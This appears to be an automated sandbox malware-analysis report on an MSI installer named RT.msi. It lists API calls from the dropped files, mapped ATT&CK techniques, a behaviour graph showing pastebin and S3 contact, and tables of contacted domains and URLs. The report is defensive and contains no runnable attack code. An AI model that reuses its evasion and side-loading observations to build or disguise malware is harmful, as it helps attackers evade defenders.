Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_004BA938 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_004BA938
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_004BE2B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_004BE2B9
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_004BA938 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_004BA938
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_004BE2B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_004BE2B9
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_004BA523 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_004BA523
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_004BA938 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_004BA938
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F75360 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,GetModuleHandleW,GetProcAddress,CloseHandle,Sleep,Sleep,EnumWindows,BringWindowToTop,14_2_00F75360
Source: Object.exe, 00000010.00000002.558087345.00000000017E0000.00000002.00020000.sdmp, Object.exe, 00000014.00000002.557973745.0000000001840000.00000002.00020000.sdmp, Object.exe, 00000016.00000002.558216753.00000000017E0000.00000002.00020000.sdmpBinary or memory string: Program Manager
Source: Object.exe, 00000010.00000002.558087345.00000000017E0000.00000002.00020000.sdmp, Object.exe, 00000014.00000002.557973745.0000000001840000.00000002.00020000.sdmp, Object.exe, 00000016.00000002.558216753.00000000017E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: Object.exe, 00000010.00000002.558087345.00000000017E0000.00000002.00020000.sdmp, Object.exe, 00000014.00000002.557973745.0000000001840000.00000002.00020000.sdmp, Object.exe, 00000016.00000002.558216753.00000000017E0000.00000002.00020000.sdmpBinary or memory string: Progman
Source: Object.exe, 00000010.00000002.558391459.0000000002C69000.00000004.00000001.sdmp, Object.exe, 00000014.00000002.558167094.0000000002C89000.00000004.00000001.sdmp, Object.exe, 00000016.00000002.558609450.0000000002C29000.00000004.00000001.sdmpBinary or memory string: Program Manager65792
Source: Object.exe, 00000010.00000002.558087345.00000000017E0000.00000002.00020000.sdmp, Object.exe, 00000014.00000002.557973745.0000000001840000.00000002.00020000.sdmp, Object.exe, 00000016.00000002.558216753.00000000017E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: Object.exe, 00000010.00000002.558892132.0000000002D2F000.00000004.00000001.sdmp, Object.exe, 00000014.00000002.558520230.0000000002D4F000.00000004.00000001.sdmp, Object.exe, 00000016.00000002.559183663.0000000002CEF000.00000004.00000001.sdmpBinary or memory string: Program Manager@
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\Installer\MSIBA90.tmpCode function: EnumSystemLocalesW,14_2_00FAC87F
Source: C:\Windows\Installer\MSIBA90.tmpCode function: EnumSystemLocalesW,14_2_00FAC834
Source: C:\Windows\Installer\MSIBA90.tmpCode function: EnumSystemLocalesW,14_2_00FAC91A
Source: C:\Windows\Installer\MSIBA90.tmpCode function: GetLocaleInfoW,14_2_00FA7A9B
Source: C:\Windows\Installer\MSIBA90.tmpCode function: GetLocaleInfoEx,___wcsnicmp_ascii,14_2_00F94CE8
Source: C:\Windows\Installer\MSIBA90.tmpCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,14_2_00F94DB3
Source: C:\Windows\Installer\MSIBA90.tmpCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,14_2_00FAC58E
Source: C:\Windows\Installer\MSIBA90.tmpCode function: EnumSystemLocalesW,14_2_00FA7528
Source: C:\Windows\Installer\MSIBA90.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,14_2_00FACD22
Source: C:\Windows\Installer\MSIBA90.tmpCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_00FACEFD
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,16_2_004D2169
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: EnumSystemLocalesW,16_2_004D23B6
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: GetLocaleInfoW,16_2_004D2851
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: IsValidCodePage,GetLocaleInfoW,16_2_004D1831
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: EnumSystemLocalesW,16_2_004D1AF4
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: EnumSystemLocalesW,16_2_004D1AA9
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: EnumSystemLocalesW,16_2_004D1B8F
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,20_2_004D2169
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: EnumSystemLocalesW,20_2_004D23B6
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: GetLocaleInfoW,20_2_004D2851
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: IsValidCodePage,GetLocaleInfoW,20_2_004D1831
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: EnumSystemLocalesW,20_2_004D1AF4
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: EnumSystemLocalesW,20_2_004D1AA9
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: EnumSystemLocalesW,20_2_004D1B8F
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,22_2_004D2169
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: EnumSystemLocalesW,22_2_004D23B6
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: GetLocaleInfoW,22_2_004D2851
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: IsValidCodePage,GetLocaleInfoW,22_2_004D1831
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: EnumSystemLocalesW,22_2_004D1AF4
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: EnumSystemLocalesW,22_2_004D1AA9
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: EnumSystemLocalesW,22_2_004D1B8F
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F80D90 cpuid 14_2_00F80D90
Source: C:\Windows\Installer\MSIBA90.tmpCode function: 14_2_00F8187C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,14_2_00F8187C
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_004CF0B4 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,16_2_004CF0B4
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 16_2_004742B0 GetVersionExW,InterlockedExchange,16_2_004742B0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_004A6020 EnterCriticalSection,ResetEvent,RpcServerListen,InterlockedDecrement,RpcServerRegisterIf2,InterlockedDecrement,LeaveCriticalSection,20_2_004A6020
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_004B8810 bind,listen,20_2_004B8810
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 20_2_004AFBA0 InterlockedIncrement,EnterCriticalSection,LeaveCriticalSection,RpcBindingInqAuthClientW,SetLastError,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,RpcStringFreeW,20_2_004AFBA0
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_004A6020 EnterCriticalSection,ResetEvent,RpcServerListen,InterlockedDecrement,RpcServerRegisterIf2,InterlockedDecrement,LeaveCriticalSection,22_2_004A6020
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_004B8810 bind,listen,22_2_004B8810
Source: C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exeCode function: 22_2_004AFBA0 InterlockedIncrement,EnterCriticalSection,LeaveCriticalSection,RpcBindingInqAuthClientW,SetLastError,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,RpcStringFreeW,22_2_004AFBA0

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Replication Through Removable Media1Windows Management Instrumentation11DLL Side-Loading1Exploitation for Privilege Escalation1Disable or Modify Tools1Input Capture11System Time Discovery2Replication Through Removable Media1Archive Collected Data1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsCommand and Scripting Interpreter2Registry Run Keys / Startup Folder1DLL Side-Loading1Deobfuscate/Decode Files or Information1LSASS MemoryPeripheral Device Discovery11Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Process Injection2Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationEncrypted Channel11Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder1DLL Side-Loading1NTDSSystem Information Discovery146Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol4Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading121Cached Domain CredentialsSecurity Software Discovery41VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion1DCSyncVirtualization/Sandbox Evasion1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection2Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 539254 Sample: RT.msi Startdate: 14/12/2021 Architecture: WINDOWS Score: 56 64 Machine Learning detection for dropped file 2->64 66 Connects to a pastebin service (likely for C&C) 2->66 7 msiexec.exe 16 38 2->7         started        11 Object.exe 1 1 2->11         started        14 Object.exe 2->14         started        16 2 other processes 2->16 process3 dnsIp4 38 C:\Windows\Installer\MSIBA90.tmp, PE32 7->38 dropped 40 C:\Windows\Installer\MSIAF72.tmp, PE32 7->40 dropped 42 C:\Windows\Installer\MSI7FC6.tmp, PE32 7->42 dropped 44 7 other files (none is malicious) 7->44 dropped 70 Drops executables to the windows directory (C:\Windows) and starts them 7->70 18 msiexec.exe 4 23 7->18         started        23 MSIBA90.tmp 7->23         started        52 www.google.com 172.217.168.36, 443, 49753, 49792 GOOGLEUS United States 11->52 54 pastebin.com 104.23.98.190, 443, 49756, 49793 CLOUDFLARENETUS United States 11->54 25 iexplore.exe 2 49 11->25         started        56 104.23.99.190, 443, 49796 CLOUDFLARENETUS United States 14->56 file5 signatures6 process7 dnsIp8 46 s3-r-w.us-east-2.amazonaws.com 52.219.96.48, 443, 49752 AMAZON-02US United States 18->46 48 procuradoriageral.s3.us-east-2.amazonaws.com 18->48 30 C:\Users\user\AppData\Roaming\...\Oleacc.dll, PE32 18->30 dropped 32 C:\Users\user\AppData\...\ssleay32.dll, PE32 18->32 dropped 34 C:\Users\user\AppData\...\libeay32.dll, PE32 18->34 dropped 36 C:\Users\user\AppData\Roaming\...\Object.exe, PE32 18->36 dropped 68 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 18->68 50 bit.ly 25->50 27 iexplore.exe 3 65 25->27         started        file9 signatures10 process11 dnsIp12 58 cdn.statically.io 27->58 60 mc.yandex.ru 93.158.134.119, 443, 49790, 49791 YANDEXRU Russian Federation 27->60 62 6 other IPs or domains 27->62

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
RT.msi0%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Oleacc.dll100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe3%MetadefenderBrowse
C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\Object.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\libeay32.dll3%MetadefenderBrowse
C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\libeay32.dll2%ReversingLabs
C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\ssleay32.dll0%MetadefenderBrowse
C:\Users\user\AppData\Roaming\WEFHWE0-FWEUY-F9WUEFWWEF\BND0WEPWEJFC-9UEWFF\ssleay32.dll0%ReversingLabs
C:\Windows\Installer\MSI71A4.tmp0%MetadefenderBrowse
C:\Windows\Installer\MSI71A4.tmp0%ReversingLabs
C:\Windows\Installer\MSI74A2.tmp0%MetadefenderBrowse
C:\Windows\Installer\MSI74A2.tmp0%ReversingLabs
C:\Windows\Installer\MSI759D.tmp0%MetadefenderBrowse
C:\Windows\Installer\MSI759D.tmp0%ReversingLabs
C:\Windows\Installer\MSI7689.tmp0%MetadefenderBrowse
C:\Windows\Installer\MSI7689.tmp2%ReversingLabs
C:\Windows\Installer\MSI77C2.tmp0%MetadefenderBrowse
C:\Windows\Installer\MSI77C2.tmp0%ReversingLabs
C:\Windows\Installer\MSI7A16.tmp0%MetadefenderBrowse
C:\Windows\Installer\MSI7A16.tmp2%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
static.cloudflareinsights.com0%VirustotalBrowse
tdns5.gtranslate.net0%VirustotalBrowse
websetnet.net0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://websetnet.net/pt/etiqueta/blogue/0%Avira URL Cloudsafe
https://cdn.statically.io/css/websetnet.net/wp-content/plugins/yet-another-related-posts-plugin/style/related.css0%Avira URL Cloudsafe
https://websetnet.net/gu/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/pt/etiqueta/Fashoin/0%Avira URL Cloudsafe
https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google02&market=0%Avira URL Cloudsafe
https://cdn.statically.io/gh/taufik-nurrohman/f3h/v1.0.12/f3h.min.js0%Avira URL Cloudsafe
https://websetnet.net/pt/the-7-best-pdf-readers-for-windows-em-2020/0%Avira URL Cloudsafe
https://websetnet.net/sl/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/pt/2020/07/0%Avira URL Cloudsafe
https://websetnet.net/bs/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/pt/2020/08/0%Avira URL Cloudsafe
https://websetnet.net/pt/etiqueta/ferramenta-de-Recorte/0%Avira URL Cloudsafe
http://www.indyproject.org/0%URL Reputationsafe
https://websetnet.net/yi/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://cdn.statically.io/css/websetnet.net/wp-content/plugins/wordpress-popular-posts/assets/css/wpp.css0%Avira URL Cloudsafe
https://cdn.statically.io/js/websetnet.net/wp-content/plugins/sassy-social-share/public/js/sassy-social-share-public.js0%Avira URL Cloudsafe
https://websetnet.net/hu/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/pt/etiqueta/5g/0%Avira URL Cloudsafe
https://websetnet.net/no/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/pt/etiqueta/Call-of-Duty/0%Avira URL Cloudsafe
https://websetnet.net/pt/etiqueta/aur%C3%A9ola-infinita/0%Avira URL Cloudsafe
https://websetnet.net/cs/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://cdn.statically.io/js/websetnet.net/wp-content/plugins/cfmonitor/js/check_min.js0%Avira URL Cloudsafe
https://cdn.statically.io/js/websetnet.net/wp-content/themes/genesis/lib/js/skip-links.min.js0%Avira URL Cloudsafe
https://websetnet.net/tg/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://cdn.statically.io/wp/p/statically/1.2.1/static/pagebooster.js0%Avira URL Cloudsafe
https://websetnet.net/st/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/ca/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/km/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/mr/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google0%Avira URL Cloudsafe
https://websetnet.net/pt/categoria/Sistema-admin/scripts-de-sites/wordpress/0%Avira URL Cloudsafe
https://websetnet.net/pt/etiqueta/impressionante/0%Avira URL Cloudsafe
https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google8Y%Q0%Avira URL Cloudsafe
https://cdn.statically.io/css/websetnet.net/wp-content/themes/magazine-pro/lib/gutenberg/front-end.c0%Avira URL Cloudsafe
https://websetnet.net/es/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/pt/categoria/tecnologia/m%C3%B3vel/0%Avira URL Cloudsafe
https://cdn.statically.io/js/websetnet.net/wp-content/themes/genesis/lib/js/menu/superfish.min.js0%Avira URL Cloudsafe
https://cdn.statically.io/css/websetnet.net/wp-content/plugins/sassy-social-share/admin/css/sassy-so0%Avira URL Cloudsafe
https://websetnet.net/pt/etiqueta/fones-de-ouvido-sem-fio/0%Avira URL Cloudsafe
https://websetnet.net/ro/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/lo/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/pt/etiqueta/Microsoft-Edge/0%Avira URL Cloudsafe
https://websetnet.net/pt/corrigir-erro-de-dll-isdone-unarc-dll-retornou-mensagem-de-c%C3%B3digo-de-e0%Avira URL Cloudsafe
https://websetnet.net/vi/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/0%Avira URL Cloudsafe
https://websetnet.net/ne/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/af/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://cdn.statically.io/js/websetnet.net/wp-content/plugins/wordpress-popular-posts/assets/js/wpp.0%Avira URL Cloudsafe
https://websetnet.net/pt/wp-login.php0%Avira URL Cloudsafe
https://websetnet.net/nl/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/pt/2020/09/0%Avira URL Cloudsafe
https://websetnet.net/pt/como-recuperar-mensagens-apagadas-no-snapchat/0%Avira URL Cloudsafe
https://websetnet.net/pt/etiqueta/ambiente-2/0%Avira URL Cloudsafe
https://websetnet.net/pt/Guia-dos-12-melhores-antiv%C3%ADrus-com-atualiza%C3%A7%C3%B5es-offline-20200%Avira URL Cloudsafe
https://websetnet.net/pt/2019/03/0%Avira URL Cloudsafe
https://websetnet.net/tl/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/sq/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/pt/etiqueta/oneplus-north/0%Avira URL Cloudsafe
https://websetnet.net/haw/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/ta/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/pt/categoria/Sistema-admin/ma%C3%A7%C3%A3-mac/0%Avira URL Cloudsafe
https://websetnet.net/pt/autor/billy16/0%Avira URL Cloudsafe
https://cdn.statically.io/wp/c/5.8.2/wp-includes/js/jquery/jquery.min.js0%Avira URL Cloudsafe
https://cdn.statically.io/img/websetnet.net/f=auto%2Cq=60/wp-content/uploads/2020/07/favicon-16x16-p0%Avira URL Cloudsafe
https://websetnet.net/my/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/pt/2021/11/0%Avira URL Cloudsafe
https://websetnet.net/pt/Como-fa%C3%A7o-para-ativar-ou-desativar-a-tecla-alt-gr-no-teclado-do-Window0%Avira URL Cloudsafe
https://websetnet.net/pt/2019/02/0%Avira URL Cloudsafe
https://websetnet.net/pt/sites-para-assistir-filmes-on-line-10-melhores-sites-sem-baix%C3%A1-los/0%Avira URL Cloudsafe
https://websetnet.net/az/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/ml/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://cdn.statically.io/js/websetnet.net/wp-content/plugins/wordpress-popular-posts/assets/js/wpp.min.js0%Avira URL Cloudsafe
https://cdn.statically.io/wp/c/5.8.2/wp-includes/js/hoverIntent.min.js0%Avira URL Cloudsafe
https://websetnet.net/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/pt/categoria/Marketing-na-Internet/0%Avira URL Cloudsafe
https://websetnet.net/ko/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/sr/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe
https://websetnet.net/pt/2019/01/0%Avira URL Cloudsafe
https://websetnet.net/pt/etiqueta/tecnologia-2/0%Avira URL Cloudsafe
https://websetnet.net/pt/etiqueta/alimento-2/0%Avira URL Cloudsafe
https://websetnet.net/pt/2021/10/0%Avira URL Cloudsafe
https://websetnet.net/pt/categoria/Sistema-admin/scripts-de-sites/0%Avira URL Cloudsafe
https://websetnet.net/mt/fix-there-was-an-error-opening-this-document/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
cloudflare.staticallydns.com
104.16.18.94
truefalse
    unknown
    mc.yandex.ru
    93.158.134.119
    truefalse
      high
      static.cloudflareinsights.com
      104.16.94.65
      truefalseunknown
      bit.ly
      67.199.248.11
      truefalse
        high
        www.google.com
        172.217.168.36
        truefalse
          high
          tdns5.gtranslate.net
          172.67.159.235
          truefalseunknown
          s3-r-w.us-east-2.amazonaws.com
          52.219.96.48
          truefalse
            high
            pastebin.com
            104.23.98.190
            truefalse
              high
              websetnet.net
              104.26.9.138
              truefalseunknown
              cdn.statically.io
              unknown
              unknowntrue
                unknown
                procuradoriageral.s3.us-east-2.amazonaws.com
                unknown
                unknownfalse
                  high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://cdn.statically.io/css/websetnet.net/wp-content/plugins/yet-another-related-posts-plugin/style/related.cssfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.statically.io/gh/taufik-nurrohman/f3h/v1.0.12/f3h.min.jsfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.statically.io/css/websetnet.net/wp-content/plugins/wordpress-popular-posts/assets/css/wpp.cssfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.statically.io/js/websetnet.net/wp-content/plugins/sassy-social-share/public/js/sassy-social-share-public.jsfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.statically.io/js/websetnet.net/wp-content/plugins/cfmonitor/js/check_min.jsfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.statically.io/js/websetnet.net/wp-content/themes/genesis/lib/js/skip-links.min.jsfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.statically.io/wp/p/statically/1.2.1/static/pagebooster.jsfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=googlefalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.statically.io/js/websetnet.net/wp-content/themes/genesis/lib/js/menu/superfish.min.jsfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.statically.io/wp/c/5.8.2/wp-includes/js/jquery/jquery.min.jsfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdn.statically.io/js/websetnet.net/wp-content/plugins/wordpress-popular-posts/assets/js/wpp.min.jsfalse
                  • Avira URL Cloud: safe
                  unknown
